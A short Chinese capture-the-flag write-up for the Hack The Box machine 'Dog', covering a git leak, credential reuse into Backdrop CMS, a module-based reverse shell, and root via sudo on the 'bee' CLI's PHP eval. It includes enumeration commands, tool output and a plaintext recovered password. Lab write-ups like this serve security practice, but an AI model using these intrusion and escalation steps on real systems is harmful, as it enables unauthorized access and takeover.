HTB-Dog

扫目录扫到git泄露 githacker开扒

在files目录发现了应该是别的师傅写的马，还是不直接用了吧

robots.txt

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html
#
# For syntax checking, see:
# http://www.robotstxt.org/checker.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /core/
Disallow: /profiles/
# Files
Disallow: /README.md
Disallow: /web.config
# Paths (clean URLs)
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
# Paths (no clean URLs)
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: /?q=node/add
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logout

git历史中没发现内容

在setting中找到mysql的账号和密码

update.settings.json找到一个用户

尝试组合登录一下 成功

进去后先找文件上传/命令执行的点->插件优先

Modules for Backdrop CMS | Backdrop CMS

10.10.11.58

反弹shell

直接拿数据库密码登录了johncusack

python3 -c 'import pty;pty.spawn("/bin/bash")'
johncusack@dog:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
johncusack@dog:~$ sudo -l
sudo -l
[sudo] password for johncusack: BackDropJ2024DS2024

Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$ 

<?php
/**
 * @file
 * A command line utility for Backdrop CMS.
 */

// Exit gracefully with a meaningful message if installed within a web
// accessible location and accessed in the browser.
if (!bee_is_cli()) {
  echo bee_browser_load_html();
  die();
}

// Set custom error handler.
set_error_handler('bee_error_handler');

// Include files.
require_once __DIR__ . '/includes/miscellaneous.inc';
require_once __DIR__ . '/includes/command.inc';
require_once __DIR__ . '/includes/render.inc';
require_once __DIR__ . '/includes/filesystem.inc';
require_once __DIR__ . '/includes/input.inc';
require_once __DIR__ . '/includes/globals.inc';

// Main execution code.
bee_initialize_server();
bee_parse_input();
bee_initialize_console();
bee_process_command();
bee_print_messages();
bee_display_output();
exit();

/**
 * Custom error handler for `bee`.
 *
 * @param int $error_level
 *   The level of the error.
 * @param string $message
 *   Error message to output to the user.
 * @param string $filename
 *   The file that the error came from.
 * @param int $line
 *   The line number the error came from.
 * @param array $context
 *   An array of all variables from where the error was triggered.
 *
 * @see https://www.php.net/manual/en/function.set-error-handler.php
 * @see _backdrop_error_handler()
 */
function bee_error_handler($error_level, $message, $filename, $line, array $context = NULL) {
  require_once __DIR__ . '/includes/errors.inc';
  _bee_error_handler_real($error_level, $message, $filename, $line, $context);
}

/**
 * Detects whether the current script is running in a command-line environment.
 */
function bee_is_cli() {
  return (empty($_SERVER['SERVER_SOFTWARE']) && (php_sapi_name() == 'cli' || (is_numeric($_SERVER['argc']) && $_SERVER['argc'] > 0)));
}

/**
 * Return the HTML to display if this page is loaded in the browser.
 *
 * @return string
 *   The concatentated html to display.
 */
function bee_browser_load_html() {
  // Set the title to use in h1 and title elements.
  $title = "Bee Gone!";
  // Place a white block over "#!/usr/bin/env php" as this is output before
  // anything else.
  $browser_output = "<div style='background-color:white;position:absolute;width:15rem;height:3rem;top:0;left:0;z-index:9;'>&nbsp;</div>";
  // Add the bee logo and style appropriately.
  $browser_output .= "<img src='./images/bee.png' align='right' width='150' height='157' style='max-width:100%;margin-top:3rem;'>";
  // Add meaningful text.
  $browser_output .= "<h1 style='font-family:Tahoma;'>$title</h1>";
  $browser_output .= "<p style='font-family:Verdana;'>Bee is a command line tool only and will not work in the browser.</p>";
  // Add the document title using javascript when the window loads.
  $browser_output .= "<script>window.onload = function(){document.title='$title';}</script>";
  // Output the combined string.
  return $browser_output;
}

johncusack@dog:/$ /usr/local/bin/bee
/usr/local/bin/bee
馃悵 Bee
Usage: bee [global-options] <command> [options] [arguments]

Global Options:
 --root
 Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.

 --site
 Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site automatically based on the current directory.

 --base-url
 Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site.

 --yes, -y
 Answer 'yes' to questions without prompting.

 --debug, -d
 Enables 'debug' mode, in which 'debug' and 'log' type messages will be displayed (in addition to all other messages).


Commands:
 CONFIGURATION
  config-export
   cex, bcex
   Export config from the site.

  config-get
   cget
   Get the value of a specific config option, or view all the config options in a given file.

  config-import
   cim, bcim
   Import config into the site.

  config-set
   cset
   Set the value of an option in a config file.

 CORE
  download-core
   dl-core
   Download Backdrop core.

  install
   si, site-install
   Install Backdrop and setup a new site.

 DATABASE
  db-drop
   sql-drop
   Drop the current database and recreate an empty database with the same details. This could be used prior to import if the target database has more tables than the source database.

  db-export
   dbex, db-dump, sql-export, sql-dump
   Export the database as a compressed SQL file. This uses the --no-tablespaces option by default.

  db-import
   dbim, sql-import
   Import an SQL file into the current database.

 INFORMATION
  help
   Provide help and examples for 'bee' and its commands.

  log
   ws, dblog, watchdog-show
   Show database log messages.

  status
   st, info, core-status
   Provides an overview of the current Backdrop installation/site.

  version
   Display the current version of Bee.

 MISCELLANEOUS
  cache-clear
   cc
   Clear a specific cache, or all Backdrop caches.

  cron
   Run cron.

  maintenance-mode
   mm
   Enable or disable maintenance mode for Backdrop.

 PROJECTS
  disable
   dis, pm-disable
   Disable one or more projects (modules, themes, layouts).

  download
   dl, pm-download
   Download Backdrop contrib projects.

  enable
   en, pm-enable
   Enable one or more projects (modules, themes, layouts).

  projects
   pml, pmi, project, pm-list, pm-info
   Display information about available projects (modules, themes, layouts).

  uninstall
   pmu, pm-uninstall
   Uninstall one or more modules.

 ROLES
  permissions
   pls, permissions-list
   List all permissons of the modules.

  role-add-perm
   rap
   Grant specified permission(s) to a role.

  role-create
   rcrt
   Add a role.

  role-delete
   rdel
   Delete a role.

  role-remove-perm
   rrp
   Remove specified permission(s) from a role.

  roles
   rls, roles-list
   List all roles with the permissions.

 STATE
  state-get
   sg, sget
   Get the value of a Backdrop state.

  state-set
   ss, sset
   Set the value of an existing Backdrop state.

 THEMES
  theme-admin
   admin-theme
   Set the admin theme.

  theme-default
   default-theme
   Set the default theme.

 UPDATE
  update-db
   updb, updbst, updatedb, updatedb-status
   Show, and optionally apply, all pending database updates.

 USERS
  user-add-role
   urole, urol
   Add role to user.

  user-block
   ublk
   Block a user.

  user-cancel
   ucan
   Cancel/remove a user.

  user-create
   ucrt
   Create a user account with the specified name.

  user-login
   uli
   Display a login link for a given user.

  user-password
   upw, upwd
   Reset the login password for a given user.

  user-remove-role
   urrole, urrol
   Remove a role from a user.

  user-unblock
   uublk
   Unblock a user.

  users
   uls, user-list
   List all user accounts.

 ADVANCED
  db-query
   dbq
   Execute a query using db_query().

  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

  php-script
   scr
   Execute an arbitrary PHP file after bootstrapping Backdrop.

  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.

注意到有一个命令执行参数

直接执行/bin/bash -p即可